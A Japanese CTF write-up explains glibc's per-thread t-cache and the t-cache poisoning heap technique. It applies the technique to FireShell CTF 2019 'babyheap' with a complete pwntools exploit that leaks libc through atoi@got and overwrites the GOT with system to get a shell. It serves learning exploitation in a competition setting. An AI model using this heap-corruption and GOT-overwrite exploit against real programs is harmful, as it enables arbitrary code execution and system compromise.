今日はptr-yudaiにt-cache poisoningというテクニックを教えてもらいました。これを使って解ける問題も解き方も教えてもらったので、忘れないうちに書いておきます。

t-cache

t-cacheは2017-08-02にリリースされたglibc 2.26から追加されています（t-cacheが追加されたパッチはこちら）。リリースノートには以下のようにあって、要約すると「mallocに関してスレッド毎のキャッシュを持つようになった。排他制御が必要ないので高速になっている」程度の意味だと思います。t-cache poisoningにはt-cacheに関する知識が必要になるので、簡単に概要を述べていきます。

A per-thread cache has been added to malloc. Access to the cache requires no locks and therefore significantly accelerates the fast path to allocate and free small amounts of memory. Refilling an empty cache requires locking the underlying arena. Performance measurements show significant gains in a wide variety of user workloads. Workloads were captured using a special instrumented malloc and analyzed with a malloc simulator. Contributed by DJ Delorie with the help of Florian Weimer, and Carlos O'Donell.

t-cacheの実体

malloc.c内に次のような定義が見られます。tcacheというスレッドローカル変数が存在していて、fastbinsのようにキャッシュされた領域をサイズ毎にリンクリストでつないで配列で持っています。定数TCACHE_MAX_BINSはデフォルトでは64になっていて、キャッシュされるサイズは0x18, 0x28, 0x38, ..., 0x408バイト以下というように区切られています*1。また、リンクリストの長さが定数TCACHE_FILL_COUNTによって制限されていて、デフォルトでは7になっています*2。

/* We overlay this structure on the user-data portion of a chunk when
   the chunk is stored in the per-thread cache.  */
typedef struct tcache_entry
{
  struct tcache_entry *next;
} tcache_entry;

/* There is one of these for each thread, which contains the
   per-thread cache (hence "tcache_perthread_struct").  Keeping
   overall size low is mildly important.  Note that COUNTS and ENTRIES
   are redundant (we could have just counted the linked list each
   time), this is for performance reasons.  */
typedef struct tcache_perthread_struct
{
  char counts[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;
static __thread char tcache_shutting_down = 0;
static __thread tcache_perthread_struct *tcache = NULL;

このt-cacheへのキャッシュはfastbinsへのキャッシュよりも優先して行われます。そしてCTF的な観点でfastbinsと大きく異なることは、malloc時にchunksizeを確認しないことです。fastbinsから割当てを行う場合はその領域のchunksizeからfastbin_indexを再計算してindexが正しいかを確認する処理が入っているのですが、t-cacheのときにはなぜかこれがありません。現状最新のglibc.2.29でもやはりこのチェックは導入されていませんでした。このチェックはfastbins unlink attackを難しくするものでしたが、t-cache poisoningではこの制限がないということになります。

t-cache poisoning

t-cacheもfastbinsと同じようにlinked listで領域を管理しているので、tcache_entry.nextに当たる部分をUseAfterFreeなどで書き換えることができます。例えば、下図の状態で領域Aはfreeされてt-cacheにキャッシュされていますが、UseAfterFree脆弱性がありnext部分（ここがmallocで返されるアドレスです）を自由に書き換えられると、次のように任意のアドレスをmallocの返り値とすることができます。

UseAfterFree脆弱性を利用して、nextが任意のアドレスを指すようにする（ここでは0xdeadbeefcafebabe）
malloc(0x10)など、tcache.entries[0]にキャッシュされている領域を使うようにmallocする。このとき領域Aのアドレスが返される
もう一度malloc(0x10)とする。chunksizeに関するチェックがないのでそのまま0xdeadbeefcafebabeを返す

f:id:Furutsuki:20190225235618p:plain

f:id:Furutsuki:20190226000119p:plain

f:id:Furutsuki:20190226000217p:plain

やっていることはfastbins unlink attackと同じですが、0xdeadbeefcafebabe - 0x8をchunksizeとして見てt_cacheにおけるインデックスを計算する、というチェックが入っていないため、どのようなアドレスでもこの手順で返してくることができます。

FireShell CTF 2019 babyheap

t-cache poisoningを利用して解く問題です。64bit ELFとlibcが与えられていて、セキュリティ機構はNX bitとPartial RELROだけです。ELFの挙動は大体次のとおりです。bufに対するCRUD操作が行えますが、それぞれ1回に回数が制限されています（CREATEのみDELETEすると回数制限が復活しますが）。

int create_flag = 0;
int edit_flag = 0;
int show_flag = 0;
int delete_flag = 0;
int fill_flag = 0;
char *buf;

int main() {
  char input[8];
  while (true) {
    read(0, input, 8);
    int choice = atoi(input);
    if (choice == 1 && create_flag == 0) {
      buf = malloc(0x60);
      create_flag = 1;
    } else if (choice == 2 && edit_flag == 0) {
      read(0, buf, 0x40);
      edit_flag = 1;
    } else if (choice == 3 && show_flag == 0) {
      printf("%s", buf);
      show_flag = 1;
    } else if (choice == 4 && delete_flag == 0) {
      free(buf);
      create_flag = 0;
      delete_flag = 1;
    } else if (choice == 1337 && fill_flag == 0) {
      buf = malloc(0x60);
      read(0, buf, 0x40);
    } else {
      exit(0);
    }
  }
}

この問題の場合、CREATE DELETE とするとt-cacheに領域がキャッシュされ、そのnext要素にあたる部分をEDITで書き換えてt-cache poisoningが可能です。更にFILLを行うことでbufに任意のアドレスを割当て、そこに書き込みを行うことができます。各種フラグとbufはグローバル変数として存在し.bssセクションにあるので、このbufにこのアドレスを割当てます。そして0を書き込むことで各種フラグを0にし、もう一度ずつそれぞれの操作を行うことができるようにします。また、同時にbufにはatoi@gotの値を書き込んでおきます。

現在bufがatoi@gotのアドレスを指しているので、ここでSHOWを行うことでatoiのアドレスが取得でき、そこからlibcが配置されたアドレスを知ることができます。libc_baseがわかるとlibc内のsystem 関数のアドレスを求めることができるのでEDITでGOT Overwriteを行い、atoi@gotをsystem関数のアドレスに書き換えます。ここで次の入力時に"/bin/sh"などと入力するとsystem("/bin/sh")が呼び出され、フラグを取得できます。

 from pwn import *
 
 CREATE = 1
 EDIT = 2
 SHOW = 3
 DELETE = 4
 EXIT = 5
 FILL = 1337
 
 local = False
 p = process("./babyheap") if local else remote("192.168.205.10", 2000)
 
 ATOI_OFFSET = 0x0000000000042470 if local else 0x0000000000038db0
 SYSTEM_OFFSET = 0x0000000000050300 if local else 0x0000000000047dc0
 PUTS_OFFSET = 0x0000000000081010 if local else None
 
 GOT_ATOI = 0x000000602060
 FLAGS_ADDR = 0x6020a0
  
 def choice(s):
     p.recvuntil("> ")
     p.sendline(str(s))
 
 def write(s):
     p.recvuntil(" ")
     p.sendline(s)
 
 def show():
     p.recvuntil("Content: ")
     return p.recvline()
 
 choice(CREATE)
 choice(DELETE)
 
 choice(EDIT)
 write(p64(FLAGS_ADDR - 8))
 
 choice(CREATE)
 choice(FILL)
 write(p64(0) * 4 + p64(1000) + p64(GOT_ATOI)*2)
 
 
 choice(SHOW)
 addr = show().strip()
 print(len(addr))
 atoi_addr = u64(addr + "\x00\x00")
 print("LIBC atoi address: {:x}".format(atoi_addr))
 
 LIBC_BASE = atoi_addr - ATOI_OFFSET
 print("LIBC BASE ADDR: {:x}".format(LIBC_BASE))
 
 choice(EDIT)
 write(p64(LIBC_BASE + SYSTEM_OFFSET))
 
 p.interactive()